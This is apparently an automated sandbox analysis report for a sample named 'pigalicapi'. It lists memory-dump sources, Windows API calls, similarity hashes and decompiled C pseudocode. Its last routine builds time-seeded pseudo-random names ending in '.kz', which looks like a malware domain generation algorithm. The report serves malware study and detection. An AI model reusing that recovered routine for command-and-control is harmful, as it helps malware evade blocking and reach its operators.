                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThread$ReleaseSemaphore
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1483290962-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6b0b4afb1b3186992077eecdeaba32eded2b69c28accb2d6c45d86a2178ee7f6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA2171357006058BDB20DF69D98439BB7B4EF40396F14843AD88687344E735EA86CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • calloc.MSVCRT ref: 0041515D
                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 004151EB
                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 0041520F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: calloc.MSVCRT ref: 004160BA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 0041610E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 00416135
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 00416154
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041615F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041616A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateSemaphorecallocfree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1811228352-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4128b646aaba891ada79dfd1a06888151aadab1d0cf51ac5d6bc289caab5bcc4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC217FB16047049FD710AF26D48039BBBE4EF84358F458C6EE9888B342E77DC994CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateSemaphorecalloc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 194818478-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
                                                                                                                                                                                                                                                                                                        • Instruction ID: 00fe0f0be2da5e732bebc1b04f87b074566867ad18d38b5108f8291d3f12238d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A121DA71604305DFEB109F59C48438ABBE4EF40369F14886AED58CB386FB78D984CB95
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2356641437-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
                                                                                                                                                                                                                                                                                                        • Instruction ID: 611bf596c6e15f060a768f0ba072d44477f6cdd3d242876fe9a2c858f071f05c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB2168B8A093009F8344DF1AD58481AFBE5FF89760F55896EF88897321D374E941CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __dllonexit_lock_onexit_unlock
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 209411981-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
                                                                                                                                                                                                                                                                                                        • Instruction ID: da490afd404eaf5b5c0649b7776465ff8fabc6fec02763ed850c7dc601e45c55
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF11A2B0A08301CBD700FF75E4C561EBBE0AB48344F904E3EF8D497391E67895888B8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadfprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1384477639-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d9a7ceed94e7cb146748a6a4cbe518f00b590a44153bc146dcbe4ea3ecfc3d4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4711B378A087019FC700DF15D58851ABBE4FFC9714F54882EE98887325D774A949CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 17%
                                                                                                                                                                                                                                                                                                        			E00410FD0(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a52) {
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				long _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                                                                                                                        				char** _t40;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t30 =  *0x422440; // 0x0
                                                                                                                                                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					asm("repe ret");
                                                                                                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                                                                                                        					_t16 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                                        					_a4 = 0;
                                                                                                                                                                                                                                                                                                        					 *_t40 = "T%p %d %s\n";
                                                                                                                                                                                                                                                                                                        					_a12 = _a52;
                                                                                                                                                                                                                                                                                                        					_a8 = _t16;
                                                                                                                                                                                                                                                                                                        					printf(??);
                                                                                                                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                                                                                                                        					_t40 =  &(_t40[8]);
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t40 = _t40 - 0x20;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				_t20 = E004107C0(_t32);
                                                                                                                                                                                                                                                                                                        				 *_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				_t22 = E004107C0(_t32);
                                                                                                                                                                                                                                                                                                        				_t23 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                                        				 *_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				_t25 = E004107C0(_t32);
                                                                                                                                                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_t20 + 0x14));
                                                                                                                                                                                                                                                                                                        				_v32 =  *_t22;
                                                                                                                                                                                                                                                                                                        				_v36 = _t23;
                                                                                                                                                                                                                                                                                                        				_v24 = _a8;
                                                                                                                                                                                                                                                                                                        				 *_t40 = "T%p %d V=%0X H=%p %s\n";
                                                                                                                                                                                                                                                                                                        				_v40 = _t25;
                                                                                                                                                                                                                                                                                                        				printf(??);
                                                                                                                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                                                                        0x00410fd0
                                                                                                                                                                                                                                                                                                        0x00410fd8
                                                                                                                                                                                                                                                                                                        0x00411043
                                                                                                                                                                                                                                                                                                        0x00411043
                                                                                                                                                                                                                                                                                                        0x00411045
                                                                                                                                                                                                                                                                                                        0x00411045
                                                                                                                                                                                                                                                                                                        0x0041104f
                                                                                                                                                                                                                                                                                                        0x00411057
                                                                                                                                                                                                                                                                                                        0x0041105e
                                                                                                                                                                                                                                                                                                        0x00411062
                                                                                                                                                                                                                                                                                                        0x00411066
                                                                                                                                                                                                                                                                                                        0x0041103d
                                                                                                                                                                                                                                                                                                        0x0041103d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00411042
                                                                                                                                                                                                                                                                                                        0x00410fdd
                                                                                                                                                                                                                                                                                                        0x00410fe6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00410fec
                                                                                                                                                                                                                                                                                                        0x00410fef
                                                                                                                                                                                                                                                                                                        0x00410ffb
                                                                                                                                                                                                                                                                                                        0x00410ffe
                                                                                                                                                                                                                                                                                                        0x00411005
                                                                                                                                                                                                                                                                                                        0x00411011
                                                                                                                                                                                                                                                                                                        0x00411014
                                                                                                                                                                                                                                                                                                        0x0041101d
                                                                                                                                                                                                                                                                                                        0x00411021
                                                                                                                                                                                                                                                                                                        0x00411025
                                                                                                                                                                                                                                                                                                        0x00411029
                                                                                                                                                                                                                                                                                                        0x0041102d
                                                                                                                                                                                                                                                                                                        0x00411034
                                                                                                                                                                                                                                                                                                        0x00411038
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2356641437-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd093ba78cb55f5ec8a20eb079ecf1fdcd36511c02614f1ce0a8f2dc342cb654
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6611E5B4A0A301AFC754AF65D18455BBBE0FF88710F419C2EF49487311D778D8808F86
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2356641437-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
                                                                                                                                                                                                                                                                                                        • Instruction ID: 356f6c3cb5459cc125aadc62c037ca1cfb0d2d0be776f4231c60a2ad830c665d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC01EEB4A097109FC300DF15D19465BBBF0FF89710F14895EE88887324D3799945CF8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E92E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				char _v172;
                                                                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                                                        					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                                                        					_t46 = E024E97E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                                                        					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                                                        					_v32 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                                                        						E024E7D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                                                        						_t50 = E024E8BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                                                        						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                                                        						_v40 = _t50;
                                                                                                                                                                                                                                                                                                        						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                                        							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v12 = _v172;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                                        						E024E9650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                                                        						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                                                        						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                                                                        0x024e92e9
                                                                                                                                                                                                                                                                                                        0x024e92f4
                                                                                                                                                                                                                                                                                                        0x024e9308
                                                                                                                                                                                                                                                                                                        0x024e931d
                                                                                                                                                                                                                                                                                                        0x024e9322
                                                                                                                                                                                                                                                                                                        0x024e9328
                                                                                                                                                                                                                                                                                                        0x024e932b
                                                                                                                                                                                                                                                                                                        0x024e933d
                                                                                                                                                                                                                                                                                                        0x024e9357
                                                                                                                                                                                                                                                                                                        0x024e9371
                                                                                                                                                                                                                                                                                                        0x024e9376
                                                                                                                                                                                                                                                                                                        0x024e9379
                                                                                                                                                                                                                                                                                                        0x024e9380
                                                                                                                                                                                                                                                                                                        0x024e9396
                                                                                                                                                                                                                                                                                                        0x024e9382
                                                                                                                                                                                                                                                                                                        0x024e9388
                                                                                                                                                                                                                                                                                                        0x024e9388
                                                                                                                                                                                                                                                                                                        0x024e93a8
                                                                                                                                                                                                                                                                                                        0x024e93c4
                                                                                                                                                                                                                                                                                                        0x024e93c9
                                                                                                                                                                                                                                                                                                        0x024e93db
                                                                                                                                                                                                                                                                                                        0x024e93e7
